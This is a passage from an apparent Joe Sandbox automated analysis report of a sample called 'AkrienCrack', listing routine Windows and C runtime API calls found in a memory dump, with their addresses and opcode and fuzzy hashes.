                • Part of subcall function 00B4C827: new.LIBCMT ref: 00B4C893
              • new.LIBCMT ref: 00B413FE
                • Part of subcall function 00B4B07D: __EH_prolog.LIBCMT ref: 00B4B082
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: d487501fbac9537c5484a3dc99c7e4b25d88366abbe6c52852f68a2ffee6a8bc
              • Instruction ID: ed2209ca08ae7ff3f9ec62b5223586ef267ec31fa20ebcc368e1281e557f8649
              • Opcode Fuzzy Hash: d487501fbac9537c5484a3dc99c7e4b25d88366abbe6c52852f68a2ffee6a8bc
              • Instruction Fuzzy Hash: 564117B0805B409EE724DF798485AE7FBE5FF18310F504AAED5EE83282DB326654CB15
              APIs
                • Part of subcall function 00B68FA5: GetLastError.KERNEL32(?,00B80EE8,00B63E14,00B80EE8,?,?,00B63713,00000050,?,00B80EE8,00000200), ref: 00B68FA9
                • Part of subcall function 00B68FA5: _free.LIBCMT ref: 00B68FDC
                • Part of subcall function 00B68FA5: SetLastError.KERNEL32(00000000,?,00B80EE8,00000200), ref: 00B6901D
                • Part of subcall function 00B68FA5: _abort.LIBCMT ref: 00B69023
                • Part of subcall function 00B6B2AE: _abort.LIBCMT ref: 00B6B2E0
                • Part of subcall function 00B6B2AE: _free.LIBCMT ref: 00B6B314
                • Part of subcall function 00B6AF1B: GetOEMCP.KERNEL32(00000000,?,?,00B6B1A5,?), ref: 00B6AF46
              • _free.LIBCMT ref: 00B6B200
              • _free.LIBCMT ref: 00B6B236
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _free$ErrorLast_abort
              • String ID:
              • API String ID: 2991157371-0
              • Opcode ID: 41738d4ec9a0a780b5cc49e846fb738498cce84942d4b7d22915cd8164bad7f3
              • Instruction ID: 1e823c2b03b492e39e503dedfdfe3a1ddc585daa808ab7dedb37c8d956c2d250
              • Opcode Fuzzy Hash: 41738d4ec9a0a780b5cc49e846fb738498cce84942d4b7d22915cd8164bad7f3
              • Instruction Fuzzy Hash: 6331E431904204AFDB10EFA9C851E6DBBF5EF45320F2541D9E418EB291EF799D81CB50
              APIs
              • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00B49EDC,?,?,00B47867), ref: 00B497A6
              • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00B49EDC,?,?,00B47867), ref: 00B497DB
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 1c3fe9ce538147d91ae995f29f1b18324282e7e4604bb3ba1e5aacb1c22d81e9
              • Instruction ID: 1577c0e18971ce662b58307b2c8981059e4cfb01ffd1b363f58f0ac78573604e
              • Opcode Fuzzy Hash: 1c3fe9ce538147d91ae995f29f1b18324282e7e4604bb3ba1e5aacb1c22d81e9
              • Instruction Fuzzy Hash: 7C2105B1110748AFE7308F64CC85FA7B7E8EB49764F00496DF5E5821D1C374AE89AB61
              APIs
              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B47547,?,?,?,?), ref: 00B49D7C
              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00B49E2C
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: File$BuffersFlushTime
              • String ID:
              • API String ID: 1392018926-0
              • Opcode ID: 2a65398bc7d792f4f78e2a861ff5185ebe71f9810595819237d88e0622e26afa
              • Instruction ID: 4556dfcf9c8865d5c16001786f16b1fe077c3c6cfc204c9e4f6b06314b23135a
              • Opcode Fuzzy Hash: 2a65398bc7d792f4f78e2a861ff5185ebe71f9810595819237d88e0622e26afa
              • Instruction Fuzzy Hash: B721D332558246ABC714DF24C891BABBBE4EF96704F0409ACF8D187141D729EB0CEBA1
              APIs
              • GetProcAddress.KERNEL32(00000000,?), ref: 00B6A4B8
              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B6A4C5
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AddressProc__crt_fast_encode_pointer
              • String ID:
              • API String ID: 2279764990-0
              • Opcode ID: 4525d0d87aca565bdd23f8fdea471f6ed0f6ede557803e7736a68068a510a1c7
              • Instruction ID: 97fb2e2b0d208b3ddf2979bfe3ee5ad05e8b7572e6febfdfbf4fb4952cb08855
              • Opcode Fuzzy Hash: 4525d0d87aca565bdd23f8fdea471f6ed0f6ede557803e7736a68068a510a1c7
              • Instruction Fuzzy Hash: 0411E7336012209B9F259E28EC8495A73D5EF8576071642A0ED29BB344EF78DC41CAD2
              APIs
              • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00B49B35,?,?,00000000,?,?,00B48D9C,?), ref: 00B49BC0
              • GetLastError.KERNEL32 ref: 00B49BCD
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ErrorFileLastPointer
              • String ID:
              • API String ID: 2976181284-0
              • Opcode ID: 13425b6a755188e1298a42ec6a55c9a44f7a7423b27afa3002baa3ba5dd2a7b7
              • Instruction ID: e184f87978e084ffd46324b2e778945084d436babba8d248de13b722f6c6cc05
              • Opcode Fuzzy Hash: 13425b6a755188e1298a42ec6a55c9a44f7a7423b27afa3002baa3ba5dd2a7b7
              • Instruction Fuzzy Hash: 4001C4313042159F8B08CF65AC9497FB3E9EFC5B21B14466DF91687291CA71DA05BA21
              APIs
              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00B49E76
              • GetLastError.KERNEL32 ref: 00B49E82
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ErrorFileLastPointer
              • String ID:
              • API String ID: 2976181284-0
              • Opcode ID: daa4e020f689c5b381e0e8c522bb00953ef0c1771a2055eca1cfee5a4fc5024e
              • Instruction ID: 65c431152fc8f741f80fd3f64fde50e5d472e279bb19417cb82c6a267d1c0a4e
              • Opcode Fuzzy Hash: daa4e020f689c5b381e0e8c522bb00953ef0c1771a2055eca1cfee5a4fc5024e
              • Instruction Fuzzy Hash: 8801B1713042009BEB34DE29DC88B6BB7D9DB89714F14497EF146C3690DA71EE4CA611
              APIs
              • _free.LIBCMT ref: 00B68627
                • Part of subcall function 00B68518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B6C13D,00000000,?,00B667E2,?,00000008,?,00B689AD,?,?,?), ref: 00B6854A
              • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00B80F50,00B4CE57,?,?,?,?,?,?), ref: 00B68663
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Heap$AllocAllocate_free
              • String ID:
              • API String ID: 2447670028-0
              • Opcode ID: 7cca5a35b176dfe44b87df16514acd33f87a68debd3452b73ae9ea295dcd78a6
              • Instruction ID: 112d8d46f678f7e774511921a15f6a2af39230aae95508280307286d4ae5ed02
              • Opcode Fuzzy Hash: 7cca5a35b176dfe44b87df16514acd33f87a68debd3452b73ae9ea295dcd78a6
              • Instruction Fuzzy Hash: E7F0C23210111566DB312A25EC00A6B37D8DF92BA0F248395F858A6191DE7CC80095A5
              APIs
                • Part of subcall function 00B6B610: GetEnvironmentStringsW.KERNEL32 ref: 00B6B619
                • Part of subcall function 00B6B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6B63C
                • Part of subcall function 00B6B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B6B662
                • Part of subcall function 00B6B610: _free.LIBCMT ref: 00B6B675
                • Part of subcall function 00B6B610: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B6B684
              • _free.LIBCMT ref: 00B679FD
              • _free.LIBCMT ref: 00B67A04
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
              • String ID:
              • API String ID: 400815659-0
              • Opcode ID: f377185e54bdd003ba04fec196b674a86dfcb748bb4c94651d09f3d73df88761
              • Instruction ID: bbfefd176af1a7e683a88bb8f06dfbbea12ee5dc79a39fa844077cf3593074f3
              • Opcode Fuzzy Hash: f377185e54bdd003ba04fec196b674a86dfcb748bb4c94651d09f3d73df88761
              • Instruction Fuzzy Hash: DAE0ED23A4EA1211A7A2727E6C52A6F06C58F82338F200BDAF424DB1C2CE1C8842019A
              APIs
              • GetCurrentProcess.KERNEL32(?,?), ref: 00B50915
              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00B5091C
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Process$AffinityCurrentMask
              • String ID:
              • API String ID: 1231390398-0
              • Opcode ID: 2f1ec8abc62d3917638bcdcd63ce3c56fe091088f957026e8451124dd286a15f
              • Instruction ID: c19b7525992684ee040a0de5f3159b429c39e918c5989a19eeeab70b77bf85bc
              • Opcode Fuzzy Hash: 2f1ec8abc62d3917638bcdcd63ce3c56fe091088f957026e8451124dd286a15f
              • Instruction Fuzzy Hash: D8E09B72A20106AB6F05EAA89C046FB73DDEB4431271041F9EC4AD3105F930DD058660
              APIs
              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B4A27A,?,?,?,00B4A113,?,00000001,00000000,?,?), ref: 00B4A458
              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B4A27A,?,?,?,00B4A113,?,00000001,00000000,?,?), ref: 00B4A489
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: 9397eb6c4bc145be7949ab53be0da515ff40fe8274ab1b0ee5027807a90b15df
              • Instruction ID: c6d4b925782a466162ad040528fa2df9e27fcc7411bad3802eeb4ebcb66366bc
              • Opcode Fuzzy Hash: 9397eb6c4bc145be7949ab53be0da515ff40fe8274ab1b0ee5027807a90b15df
              • Instruction Fuzzy Hash: A8F0A03128020D7BDF025F60DC85FD977ACFB04781F048091BC8C87261DB72CAA8BA50
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ItemText_swprintf
              • String ID:
              • API String ID: 3011073432-0
              • Opcode ID: af86dc1b5c138f5947356f8531d6de8fa206c87b676b0d19f311446a975ec4ca
              • Instruction ID: 2ebeb0099d4e6bac62d27fc86b0c51b93f5e16493d85187f4b3ef4c6815f0840
              • Opcode Fuzzy Hash: af86dc1b5c138f5947356f8531d6de8fa206c87b676b0d19f311446a975ec4ca
              • Instruction Fuzzy Hash: 22F0EC725003487BDB21AB709C07F9937DCD704746F0406D5BB00631B2DE71AB649761
              APIs
              • DeleteFileW.KERNELBASE(?,?,?,00B4984C,?,?,00B49688,?,?,?,?,00B71FA1,000000FF), ref: 00B4A13E
              • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00B4984C,?,?,00B49688,?,?,?,?,00B71FA1,000000FF), ref: 00B4A16C
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: DeleteFile
              • String ID:
              • API String ID: 4033686569-0
              • Opcode ID: f5d9e23327fa2c4235c5a3af0d155f55dbc4faa62b3d22f39a83a2b32734258d
              • Instruction ID: 63507ee8f9ef3ae630e732bfdd9503b3bdaacd4b022ae27086c8dd6a1ec6a158
              • Opcode Fuzzy Hash: f5d9e23327fa2c4235c5a3af0d155f55dbc4faa62b3d22f39a83a2b32734258d
              • Instruction Fuzzy Hash: ADE06D796802086ADB129E609C41FE977DCAB09782F4840A5B988D3060DB61DFD8BA90
              APIs
              • GdiplusShutdown.GDIPLUS(?,?,?,?,00B71FA1,000000FF), ref: 00B5A3D1
              • OleUninitialize.OLE32(?,?,?,?,00B71FA1,000000FF), ref: 00B5A3D6
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: GdiplusShutdownUninitialize
              • String ID:
              • API String ID: 3856339756-0
              • Opcode ID: a204e736425d9d27c78303e612464cfebbc2860c1186d373887430b610de8592
              • Instruction ID: 8e226ae30c5610a224d15d7969a8a2dd469946b89557254a382a2f7d9f9f976e
              • Opcode Fuzzy Hash: a204e736425d9d27c78303e612464cfebbc2860c1186d373887430b610de8592
              • Instruction Fuzzy Hash: B9F03032518654DFC7109B4CDC05B15FBE8FB49B20F0443AAF41993B61CF756800CB91
              APIs
              • GetFileAttributesW.KERNELBASE(?,?,?,00B4A189,?,00B476B2,?,?,?,?), ref: 00B4A1A5
              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00B4A189,?,00B476B2,?,?,?,?), ref: 00B4A1D1
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: 44d3e91689063d81442ad93e4595d9a2c6a23c04dbdac6f957ada464f9b25f18
              • Instruction ID: de1387250fc78bebb62ec1bd71eecd033f3055d0438c4c06f0c24c17af5468a5
              • Opcode Fuzzy Hash: 44d3e91689063d81442ad93e4595d9a2c6a23c04dbdac6f957ada464f9b25f18
              • Instruction Fuzzy Hash: B4E092355001285BCB21AB68DC05FD9B7DCEB097E2F0042E1FD98E3290DB70DE84AAE0
              APIs
              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B500A0
              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B4EB86,Crypt32.dll,00000000,00B4EC0A,?,?,00B4EBEC,?,?,?), ref: 00B500C2
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: DirectoryLibraryLoadSystem
              • String ID:
              • API String ID: 1175261203-0
              • Opcode ID: 61d9ee7d50f71a6fce7ed38222e88476b2407aae36165ef5e4fbc379f93731ca
              • Instruction ID: 7b1ada05ef3a662ba17fd7ba5662237cd71590318aea8c1710624f9623b18f6a
              • Opcode Fuzzy Hash: 61d9ee7d50f71a6fce7ed38222e88476b2407aae36165ef5e4fbc379f93731ca
              • Instruction Fuzzy Hash: 75E0127691512C6ADB21AAA49C05FD677ECFF09782F0400E6BA48D3144DA74DA849BA4
              APIs
              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B59B30
              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00B59B37
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: BitmapCreateFromGdipStream
              • String ID:
              • API String ID: 1918208029-0
              • Opcode ID: caab8039f3ebb4787f6cd473724415958c9e260d5b35579b284879e03507aa58
              • Instruction ID: f9bdc1d54c522a5f54bdc817ef59a150f6eb5b8bcd6f31fc4c8671c26cd5179b
              • Opcode Fuzzy Hash: caab8039f3ebb4787f6cd473724415958c9e260d5b35579b284879e03507aa58
              • Instruction Fuzzy Hash: 9DE0ED71901218EBDB14DF98D941799B7E8EB08322F2080DBEC9993204D771AE089B91
              APIs
                • Part of subcall function 00B6329A: try_get_function.LIBVCRUNTIME ref: 00B632AF
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B6217A
              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00B62185
              Memory Dump Source
